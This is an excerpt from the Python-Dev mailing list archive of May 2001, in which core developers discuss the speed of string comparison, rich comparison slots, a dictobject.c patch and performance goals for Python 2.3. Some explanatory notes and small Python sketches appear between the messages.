Date: Sat, 19 May 2001 19:18:25 -0400
Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish
Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com>

For all you Douglas Adams fans out there:

    Douglas Noel Adams
       1952 - 2001

http://www.douglasadams.com

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Sun May 20 10:31:25 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 05:31:25 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> If I set tp_richcompare of strings to 0, I get past this code, and do
>
> 		c = (*f)(v, w);
> 		if (PyErr_Occurred())

Note that the usual way to write this is

 		if (c < 0 && PyErr_Occurred())

More work for my artificial "ab" < "cd" case but a net win in real life (when
c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
when c < 0 there's no way in the cmp protocol to use c's value alone to
distinguish between "less than" and "error").
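The `c < 0 &&` guard works because -1 is the only value the old cmp protocol can use to signal an error. Below is a toy Python 3 model of that convention. `ErrorState` is a hypothetical stand-in for the interpreter's error indicator, not a real API, and the model relies on Python 3 raising TypeError for int-vs-str ordering. It shows the indicator being consulted only for negative results.

```python
class ErrorState:
    """Hypothetical stand-in for the interpreter's error indicator."""

    def __init__(self):
        self.error = None
        self.checks = 0  # number of times the indicator was consulted

    def occurred(self):
        self.checks += 1
        return self.error is not None


def old_cmp(a, b, state):
    """cmp-protocol compare: returns -1, 0 or 1; -1 also signals an error."""
    try:
        return (a > b) - (a < b)
    except TypeError as exc:  # e.g. int vs str in Python 3
        state.error = exc
        return -1


def checked_cmp(a, b, state):
    """Return the 3-way result, or None if the compare raised an error."""
    c = old_cmp(a, b, state)
    # Only a negative result can mean "error", so the error-indicator
    # call is skipped whenever c >= 0.
    if c < 0 and state.occurred():
        return None
    return c
```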

> 			return NULL;
> 		return convert_3way_to_object(op, c);
>
> Here, I get 3 function calls: f is string_compare, then
> PyErr_Occurred, finally convert_3way_to_object, which converts
> {-1,0,1} x Op -> {Py_True, Py_False}.

Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.
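The mapping Martin describes, {-1,0,1} x Op -> bool, is small enough to write as a lookup table. This is a minimal Python sketch of that mapping. The names `convert_3way` and `_TESTS` are illustrative and not the object.c code. The opcode numbering follows the order of Py_LT, Py_LE, Py_EQ, Py_NE, Py_GT, Py_GE.

```python
import operator

# Opcode order follows Py_LT, Py_LE, Py_EQ, Py_NE, Py_GT, Py_GE.
LT, LE, EQ, NE, GT, GE = range(6)

# For each opcode, the test to apply to (c, 0).
_TESTS = (operator.lt, operator.le, operator.eq,
          operator.ne, operator.gt, operator.ge)


def convert_3way(op, c):
    """Turn a 3-way result c (negative, zero, positive) into the bool for op."""
    return _TESTS[op](c, 0)
```

For `"ab" < "cd"`, the 3-way result is negative, and `convert_3way(LT, -1)` is True.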

> Indeed, when I inline convert_3way_to_object, I get the same speed in
> both cases (with the remaining differences attributed to measurement
> and gcc doing register usage differently in both functions).

OK, understood, and thanks for following up!

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

In the absence of significant sorting, I agree Py_EQ is most frequent.

> With a control flow like
>
> 		if (a->ob_size != b->ob_size)
>                    goto False;
>
> 		if (a->ob_size == 0)
>                    goto True;
>
> 		if (a->ob_sval[0] != b->ob_sval[0])
>                    goto False;
>
> 		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
>                    goto False;
>                 else
>                    goto True;
>
> we can reduce the number of function calls

Suggest collapsing the third into the first:

		if (a->ob_size != b->ob_size
                || a->ob_sval[0] != b->ob_sval[0])
                    goto False;

There's no danger of over-indexing when ob_size==0, because it doesn't
include the trailing null byte Python always sticks at the end of string
objects; and the first-byte check is much more likely to pay off than the
zero-length check (comparison to a null string?  gotta be rare as clear
conclusions <wink>), and better to test for the more common case first.
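The suggested test order (length, then first byte, then the full compare) can be mirrored in Python on `bytes` objects. This is only a model of the control flow. In C, the first-byte test is safe for empty strings because of the trailing null byte. Python `bytes` have no such byte, so the sketch compares one-byte slices instead of indexing.

```python
def string_eq(a, b):
    """Equality for bytes objects in the suggested order: length,
    first byte, then a full compare standing in for memcmp()."""
    if len(a) != len(b):
        return False
    # Slicing instead of a[0]: works for empty inputs without the
    # trailing NUL byte that C strings rely on.
    if a[:1] != b[:1]:
        return False
    return a == b  # plays the role of memcmp(...) == 0
```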


From tim.one@home.com  Sun May 20 10:54:08 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 05:54:08 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>

[Tim]
>> 1. String objects are also equal despite being different objects,
>>    if their ob_sinterned pointers are equal and non-NULL.  So if
>>    you're looking for every trick in & out of the book, that's
>>    another one.

[Martin v. Loewis]
> That does not help. In the entire test suite, there are 0 instances
> where strings are compared which are not identical, but have equal
> ob_sinterned pointers.

Good to know.  Had you tried this a few weeks ago, there would have been
thousands (it so happened that one-character strings weren't being interned
*effectively*, and there were lots of 1-character cases then where #1
applied; that's been fixed; good to know more aren't popping up).

> ...
> Whether there's a fruitless branch depends on your compiler.

A branch instruction is a branch instruction; I didn't distinguish between
taken and non-taken branches, as there's no uniformity in codegen across
platforms.

> With gcc 3, you can write
>
> 	if (__builtin_expect(a == b, 0)) {
>
> and then the body of the if block will be moved out of the way of
> linear control flow.

I don't think we'll be littering Python with compiler-specific hacks.  It's
good to get the less common case out-of-line, but it's not a pure win:  while
it reduces the penalty when the test doesn't pay, it also reduces the benefit
when it does pay (by the wildly architecture-dependent cost of taking a
mispredicted out-of-line branch, and the wildly compiler-dependent costs of
how seriously they take their own decisions or user hints to out-of-line a
block (e.g., the compiler may refetch everything from memory again at the
target if it thinks it's truly rare)).

>> Any idea where those 800,000 virgin calls to oldcomp are coming
>> from?  That's a lot.

> As far as I could trace it, most of them come from lookdict_string (at
> various locations inside this function).

Ah!  Of course.  string_compare is hardwired into lookdict_string.  This case
may be important enough to merit a distinct _PyString_Equal function, with
just the stuff lookdict_string needs (e.g., there's never a gain in testing
for pointer equality when called from lookdict_string because the dict code
already checked that; but there may be a gain for that test in an all-purpose
string_richcompare).

> ...
> So to support sorting better, I should special-case Py_LT in
> string_richcompare also, to avoid the function call ?-)

Of course.  string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE
anyway, and that's most of the work for resolving all 6 possibilities.  Get
rid of string_compare entirely!
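The point here is that the memcmp() needed for Py_EQ/Py_NE already does most of the work for the ordering operators. What follows is a Python sketch of a self-contained rich compare over `bytes`. The names are hypothetical. `_memcmp` models C's memcmp() as a byte loop, and the opcodes follow the order of Py_LT .. Py_GE. Equality can short-circuit on length, but ordering cannot, because a proper prefix sorts first.

```python
# Opcode order follows Py_LT, Py_LE, Py_EQ, Py_NE, Py_GT, Py_GE.
LT, LE, EQ, NE, GT, GE = range(6)


def _memcmp(a, b, n):
    """Model of C memcmp(): sign of the first differing byte in a[:n], b[:n]."""
    for i in range(n):
        if a[i] != b[i]:
            return -1 if a[i] < b[i] else 1
    return 0


def string_richcompare(a, b, op):
    """Resolve any of the six comparisons for two bytes objects directly."""
    if op == EQ or op == NE:
        # Different lengths settle equality without touching the bytes.
        if len(a) != len(b):
            return op == NE
        same = _memcmp(a, b, len(a)) == 0
        return same if op == EQ else not same
    # Ordering: memcmp over the common prefix, then length breaks ties
    # (a proper prefix sorts first).
    c = _memcmp(a, b, min(len(a), len(b)))
    if c == 0:
        c = (len(a) > len(b)) - (len(a) < len(b))
    if op == LT:
        return c < 0
    if op == LE:
        return c <= 0
    if op == GT:
        return c > 0
    return c >= 0  # GE
```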

[on cmp sloth]
> Yes, that is a serious problem. Fortunately, very few calls in my
> programs go to string_compare through cmp() now. But then, your
> programs are different, of course...

There are search-tree modules I have but didn't write that do this; I don't
care enough about them to frustrate Guido's grand vision <wink>.

It may be more important for sequences other than 8-bit strings, as each call
to a comparison function for a pair of non-string sequences is very expensive
(involving more layers of calls for each element comparison).


From tim.one@home.com  Sun May 20 11:13:14 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 06:13:14 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.

If the time machine batteries can hold a full charge, you may want to go back
and add Py_CMP as a seventh possible desired-operation argument to the rich
comparison API.  My experience with dict comparisons was that
dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a
full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp
(potentially) compute cmp 3 times to fake one cmp.  But if dict richcmp knew
a cmp outcome was desired, it could compute it with no extra work to speak
of.  Then there would be no reason at all to hold on to the dict tp_compare
slot.

The list and tuple richcmps are also doing almost all the work needed to
compute a 3-way cmp outcome.


From tim.one@home.com  Sun May 20 12:05:53 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 07:05:53 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B037D27.E258C363@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> Running the same test for 2.1 vs. 2.0 there's not much to
> notice, so the important changes seem to be originating in
> the move from 1.5.2 to 2.0.

IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
1.5.2, and Fredrik did more independently (like inlining high-frequency int
operations in the eval loop).  Also IIRC, that's the last time any concerted
effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
unstable equilibrium never endures without deliberate and persistent
rebalancing work.  If Python were "a real product", it would be at least one
person's full-time job to keep it in peak shape.  But it's not even a
part-time job for anyone, and I don't see that changing.  In compensation,
machines have gotten faster much quicker than Python has slowed.


From mal@lemburg.com  Sun May 20 12:50:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 13:50:17 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>
Message-ID: <3B07AF79.6EB42E54@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > Running the same test for 2.1 vs. 2.0 there's not much to
> > notice, so the important changes seem to be originating in
> > the move from 1.5.2 to 2.0.
> 
> IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
> 1.5.2, and Fredrik did more independently (like inlining high-frequency int
> operations in the eval loop).  Also IIRC, that's the last time any concerted
> effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
> unstable equilibrium never endures without deliberate and persistent
> rebalancing work.  If Python were "a real product", it would be at least one
> person's full-time job to keep it in peak shape.  But it's not even a
> part-time job for anyone, and I don't see that changing.  In compensation,
> machines have gotten faster much quicker than Python has slowed.

How about making performance the main "feature" for 2.3 then ?!

2.0 - 2.2 introduced many new features in the interpreter core,
so I think it's time to stabilize those features and focus on
making Python regain the performance it had before those features
were introduced. At least to some of us, performance is an
issue and I think that there's a lot we can do to improve it.

One way to open up the field for better performance will be
to modularize the interpreter, so that new ways of optimization
can be explored, e.g. turning the VM into a register machine
(Skip once started looking into this with his Rattlesnake
patches) or creating specialized VMs which can then be used
by optimizing compilers as targets.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh@python.net  Sun May 20 12:52:40 2001
From: mwh@python.net (Michael Hudson)
Date: 20 May 2001 12:52:40 +0100
Subject: [Python-Dev] Comparison speed
In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400"
References: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>
Message-ID: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>

"Tim Peters" <tim.one@home.com> writes:

> Ah!  Of course.  string_compare is hardwired into lookdict_string.
> This case may be important enough to merit a distinct
> _PyString_Equal function, with just the stuff lookdict_string needs

Or just inlining it all into lookdict_string, something like:

Index: Objects/dictobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v
retrieving revision 2.90
diff -c -r2.90 dictobject.c
*** Objects/dictobject.c	2001/05/19 07:04:38	2.90
--- Objects/dictobject.c	2001/05/20 11:51:28
***************
*** 279,286 ****
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
- 	cmpfunc compare = PyString_Type.tp_compare;
  
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
--- 279,287 ----
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
  
+ #define S(s) ((PyStringObject*)(s))
+ 
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
***************
*** 299,305 ****
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && compare(ep->me_key, key) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
--- 300,308 ----
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && S(ep->me_key)->ob_size == S(key)->ob_size
! 		    && memcmp(S(ep->me_key)->ob_sval,
! 			      S(key)->ob_sval,S(key)->ob_size) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
***************
*** 318,324 ****
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& compare(ep->me_key, key) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
--- 321,329 ----
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& S(ep->me_key)->ob_size == S(key)->ob_size
! 			&& memcmp(S(ep->me_key)->ob_sval,
! 				  S(key)->ob_sval,S(key)->ob_size) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
***************
*** 327,332 ****
--- 332,339 ----
  		if (incr > mask)
  			incr ^= mp->ma_poly; /* clears the highest bit */
  	}
+ 
+ #undef S
  }
  
  /*

(apologies for the use of the preprocessor...).  I'll leave it to
someone else to work out if this is a win or not...

-- 
                    >> REVIEW OF THE YEAR, 2000 <<
                   It was shit. Give us another one.
                          -- NTK Know, 2000-12-29, http://www.ntk.net/


From tim.one@home.com  Sun May 20 13:57:11 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 08:57:11 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B07AF79.6EB42E54@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>

[MAL]
> How about making performance the main "feature" for 2.3 then ?!

Guido may be a dictator, but he doesn't have a magic wand -- "the main
feature" is what people volunteer to do and then fight for and then actually
do.

> 2.0 - 2.2 introduced many new features in the interpreter core,
> so I think it's time to stabilize those features and focus on
> making Python regain the performance it had before those features
> were introduced.  At least to some of us, performance is an
> issue and I think that there's a lot we can do to improve it.

"Performance" is meaningless unless quantified and made concrete:  what is it
that runs too slowly?  "Everything" is not a useful answer.  Speeding up
line-at-a-time input was an example of something that worked, via focus and
measurement and pushing ahead despite opposition.  I doubt any other approach
will bear fruit over such a short timeframe, and especially not without
resources to throw at it.

> One way to open up the field for better performance will be
> to modularize the interpreter, so that new ways of optimization
> can be explored, e.g. turning the VM into a register machine
> (Skip once started looking into this with his Rattlesnake
> patches) or creating specialized VMs which can then be used
> by optimizing compilers as targets.

Restructure the core for the benefit of optimizing compilers that don't
exist?  That sounds like an interesting research project, but not much to do
with making 2.3 faster.  In the meantime, modularization is more likely to
make the VM that does exist slower.

could-be-it's-easy-answers-or-none-ly y'rs  - tim


From tim.one@home.com  Sun May 20 13:58:09 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 08:58:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKDAA.tim.one@home.com>

[Michael Hudson]
> ...
> (apologies for the use of the preprocessor...).  I'll leave it to
> someone else to work out if this is a win or not...

Umm, but that's the *hard* part.  I think even Guido knows how to do a string
compare inline <wink>.


From tim.one@home.com  Sun May 20 14:09:50 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 09:09:50 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFKKDAA.tim.one@home.com>

[Jeremy Hylton]
> ...
> The scary thing about BuiltinFunctionCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and what their types are.

Special-casing the snot out of "O" looks like a winner <wink>:

  count     format %total  cumulative%
-------   -------- ------  -----------
1440897        'O'  47.45  47.45
 327694       'O!'  10.79  58.24
 285570      'O|i'   9.40  67.65
 262168     'O!|O'   8.63  76.28
 227405        'l'   7.49  83.77
 146537       's#'   4.83  88.60
  76779     'OO|O'   2.53  91.12
  65682      '|ss'   2.16  93.29
  48033       'OO'   1.58  94.87
  39879   'O|O&O&'   1.31  96.18

Those are the top 10 formats passed to PyArg_ParseTuple() during the test
suite, after stripping ";" and ":" decorations.
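A table like this can be produced from a log of format strings. This is a sketch in modern Python. It assumes you already have one format string per PyArg_ParseTuple() call. How that log is collected (for example, by temporarily instrumenting getargs.c) is an assumption and is left out.

```python
from collections import Counter


def normalize(fmt):
    """Strip the ':funcname' or ';message' decoration from a format string."""
    for sep in (":", ";"):
        i = fmt.find(sep)
        if i >= 0:
            fmt = fmt[:i]
    return fmt


def format_table(formats, top=10):
    """Return (count, format, %total, cumulative%) rows, most common first."""
    counts = Counter(normalize(f) for f in formats)
    total = sum(counts.values())
    rows, running = [], 0
    for fmt, n in counts.most_common(top):
        running += n
        rows.append((n, fmt, 100.0 * n / total, 100.0 * running / total))
    return rows
```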

fast-paths-on-the-overtired-brain-ly y'rs  - tim


From aahz@rahul.net  Sun May 20 14:50:08 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Sun, 20 May 2001 06:50:08 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> from "Tim Peters" at May 20, 2001 06:13:14 AM
Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> If the time machine batteries can hold a full charge, you may want
> to go back and add Py_CMP as a seventh possible desired-operation
> argument to the rich comparison API.  My experience with dict
> comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE
> any cheaper than by doing a full cmp, so I put the dict oldcmp back in
> order to avoid having dict richcmp (potentially) compute cmp 3 times
> to fake one cmp.  But if dict richcmp knew a cmp outcome was desired,
> it could compute it with no extra work to speak of.  Then there would
> be no reason at all to hold on to the dict tp_compare slot.
>
> The list and tuple richcmps are also doing almost all the work needed
> to compute a 3-way cmp outcome.

+1 from me; there's one spot in my new Decimal.py where I optimize an
expensive pair of equality tests down to one by using cmp(), and it's
likely that similar cases will pop up.  When I convert to C code, I'll
want to keep doing that.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From martin@loewis.home.cs.tu-berlin.de  Sun May 20 14:48:43 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 20 May 2001 15:48:43 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>

> string_compare() could special-case pointer equality too, although I suspect
> doing so would be a net loss.

I've done some measurements here, too, again taking your example

from time import clock

indices = [1] * 1000000

def doit():
    s = clock()
    for i in indices:
        "ab" < "ab"
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

This is the case where testing for identity helps. Running it without
identity test takes 0.74s, running it with identity test takes 0.68s.

Now, looking at the case of non-identical pointers, I could not find
any measurable difference. After increasing the number of rounds by a
factor of ten, I got, without identity test

6.920
6.920
6.910
6.970
7.080
6.920
6.920
6.910
6.930
6.920

With identity test, I got

6.930
6.930
6.920
7.080
6.920
6.930
6.960
6.930
6.920
6.920

That still does not look like a significant difference to me.
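One quick way to check this reading is to compare the difference of the means against the run-to-run spread. Here is a sketch using Python 3's `statistics` module on the ten-run numbers above. It is a rough check, not a formal significance test.

```python
import statistics

# Timings (seconds) copied from the two ten-run lists above.
without_identity = [6.920, 6.920, 6.910, 6.970, 7.080,
                    6.920, 6.920, 6.910, 6.930, 6.920]
with_identity = [6.930, 6.930, 6.920, 7.080, 6.920,
                 6.930, 6.960, 6.930, 6.920, 6.920]


def summarize(samples):
    """Return (mean, median, sample standard deviation)."""
    return (statistics.mean(samples), statistics.median(samples),
            statistics.stdev(samples))


for label, data in (("without", without_identity), ("with", with_identity)):
    mean, median, sd = summarize(data)
    print("%-8s mean=%.3f median=%.3f stdev=%.3f" % (label, mean, median, sd))
```

Both the difference of the means (about 0.004s) and the difference of the medians are well below the standard deviation of either run (about 0.05s). Most of that spread comes from the single 7.08s outlier in each list.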

Regards,
Martin


From guido@digicool.com  Sun May 20 14:56:54 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 20 May 2001 09:56:54 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT."
 <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>
Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>

> If the time machine batteries can hold a full charge, you may want to go back
> and add Py_CMP as a seventh possible desired-operation argument to the rich
> comparison API.

Funny, I was thinking about this too last night.

> My experience with dict comparisons was that dict_richcompare
> couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full
> cmp, so I put the dict oldcmp back in order to avoid having dict
> richcmp (potentially) compute cmp 3 times to fake one cmp.  But if
> dict richcmp knew a cmp outcome was desired, it could compute it
> with no extra work to speak of.  Then there would be no reason at
> all to hold on to the dict tp_compare slot.

I'm not sure I see the saving.  There's no real saving in time,
because you still have to make separate calls for EQ and CMP, right?

There might be a saving in code, but you could solve that internally
in dictobject.c by restructuring the code somewhat so that
dict_compare shared more with dict_richcompare, right?

It's mostly an API streamlining.  The other difference between
tp_compare and tp_richcompare is that the latter returns an object
which makes testing for errors unambiguous.

But (for several releases) we would still have to support tp_compare
for b/w compatibility with old 3rd party extensions.

> The list and tuple richcmps are also doing almost all the work needed to
> compute a 3-way cmp outcome.

Ditto.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Sun May 20 17:19:29 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 18:19:29 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>
Message-ID: <3B07EE91.5747F4F4@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > How about making performance the main "feature" for 2.3 then ?!
> 
> Guido may be a dictator, but he doesn't have a magic wand -- "the main
> feature" is what people volunteer to do and then fight for and then actually
> do.

I will certainly go back to the basics and redo my optimization
patches for Python later this year. Whether or not these will
get included in the core is another story, but I have a need for
a fast interpreter for my app. server and can't afford losing
too much performance when moving from 1.5.x to 2.x.
 
> > 2.0 - 2.2 introduced many new features in the interpreter core,
> > so I think it's time to stabilize those features and focus on
> > making Python regain the performance it had before those features
> > were introduced.  At least to some of us, performance is an
> > issue and I think that there's a lot we can do to improve it.
> 
> "Performance" is meaningless unless quantified and made concrete:  what is it
> that runs too slowly?  "Everything" is not a useful answer.  Speeding up
> line-at-a-time input was an example of something that worked, via focus and
> measurement and pushing ahead despite opposition.  I doubt any other approach
> will bear fruit over such a short timeframe, and especially not without
> resources to throw at it.

Let's put it this way: if pystone gets a 50% boost, then all
applications should benefit from it regardless of whether they
are function call intense or fiddle with a lot of attributes.
Achieving those 50% will be a lot harder than for the 1.5
series, though ;-)
 
> > One way to open up the field for better performance will be
> > to modularize the interpreter, so that new ways of optimization
> > can be explored, e.g. truning the VM a register machine
> > (Skip once started looking into this with his Rattlesnake
> > patches) or creating specialized VMs which can then be used
> > by optimizing compilers as targets.
> 
> Restructure the core for the benefit of optimizing compilers that don't
> exist?  That sounds like an interesting research project, but not much to do
> with making 2.3 faster.  In the meantime, modularization is more likely to
> make the VM that does exist slower.

Depends on how you look at it: extension writers will then
have the possibility of plugging in new compilers and VMs
into Python to experiment with new optimization strategies.

The Rattlesnake project is one such project which would do
great with this plugin logic since it uses special opcodes
which an optimizer generates and then needs a modified VM
to execute these new byte code streams...

from Rattlesnake import compiler, vm
sys.use_compiler(compiler)
sys.use_vm(vm)

This won't make stock Python 2.3 faster, but at least provide
better means for experiments in that direction.
Alternative VM implementations like Stackless Python would 
also benefit from it.

-- 
Marc-Andre Lemburg


From tim.one@home.com  Sun May 20 22:13:04 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 17:13:04 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>

[Martin v. Loewis, on pointer-equality tests in string_compare()]

> I've done some measurements here, too, again taking your example
> ...
>     for i in indices:
>         "ab" < "ab"
> ...
> This is the case where testing for identity helps. Running it without
> identity test takes 0.74s, running it with identity test takes 0.68s.

This stuff all ties together.  A pointer-equality test in string_compare() is
guaranteed to lose every time string_compare() gets called from
lookdict_string().  Let's lose string_compare() entirely (in favor of a
self-contained-- apart from memcmp() --string_richcompare).


From tim.one@home.com  Sun May 20 22:37:09 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 17:37:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGIKDAA.tim.one@home.com>

[Tim, muses about a Py_CMP value for rich comparisons, and talks
 mostly about dict comps]

> ...
> I'm not sure I see the saving.  There's no real saving in time,
> because you still have to make separate calls for EQ and CMP, right?

Right so far as it goes.  A "fast path" (which currently doesn't exist but is
clearly worth adding, based on both my and Martin's timings) for doing *all*
kinds of same-type comparisons would only have to look for a richcompare
slot, though, not one kind of slot in some cases and another in others.
Uniformity is contagious <wink>.

> There might be a saving in code, but you could solve that internally
> in dictobject.c by restructuring the code somewhat so that
> dict_compare shared more with dict_richcompare, right?

Right, there would be no reduction in total code, and the dict routines
already share as much as possible.  In effect, the body of dict_compare would
replace the last

		res = Py_NotImplemented;

line in the (currently tiny) dict_richcompare guarded by the appropriate
tests.

> It's mostly an API streamlining.

Bingo, and the possibility of retiring the tp_compare slot in P3K.

> The other difference between tp_compare and tp_richcompare is that
> the latter returns an object which makes testing for errors unambiguous.

Also cool.

> But (for several releases) we would still have to support tp_compare
> for b/w compatibility with old 3rd party extensions.

Sure, although the way the CVS branch code is going it could be that 2.2 is
the long-awaited utterly incompatible P3K anyway <wink>.

>> The list and tuple richcmps are also doing almost all the work needed
>> to compute a 3-way cmp outcome.

> Ditto.

Oh no!  Those aren't like dict compares.  A rich compare for sequence types
(whether strings or lists) *has* to contain almost all the code necessary to
implement cmp(), because just resolving Py_EQ in all cases has to find "the
first" element (if any) that differs.  Once that's known, you're at most one
measly element compare away from producing the right cmp() outcome.  This
isn't true of dict compares:  the algorithm for resolving dict Py_EQ/Py_NE
when the dict sizes are the same doesn't do anything to help resolve general
cmp().  Yes, a tp_compare slot could be re-added to lists and tuples, and
implemented via refactoring their current tp_richcompare code into a common
internal routine, but then we've just added another layer of function calls
for all cases.  I've timed C function calls, and it turns out they aren't
actually free <wink>.
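A minimal Python sketch of that argument, assuming plain indexable sequences. The helper name `seq_cmp3` is hypothetical and this is not the C code in the list or tuple implementation. The loop that finds the first unequal pair is all the work an equality test needs, and at most one more `<` turns it into a full 3-way result.

```python
def seq_cmp3(v, w):
    """Return -1, 0 or 1 for sequences v and w (hypothetical helper).

    The scan for the first unequal pair is exactly the work an equality
    test has to do; the 3-way answer then costs at most one more element
    comparison.
    """
    n = min(len(v), len(w))
    i = 0
    # Same loop an == test would run: stop at the first differing pair.
    while i < n and v[i] == w[i]:
        i += 1
    if i == n:
        # No differing element in the common prefix: shorter is smaller.
        return (len(v) > len(w)) - (len(v) < len(w))
    # One measly extra comparison settles the 3-way outcome.
    return -1 if v[i] < w[i] else 1
```

For example, `seq_cmp3([1, 2, 3], [1, 2, 4])` stops at index 2 and needs just one extra `<` to return -1.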


From tim.one@home.com  Mon May 21 08:53:24 2001
From: tim.one@home.com (Tim Peters)
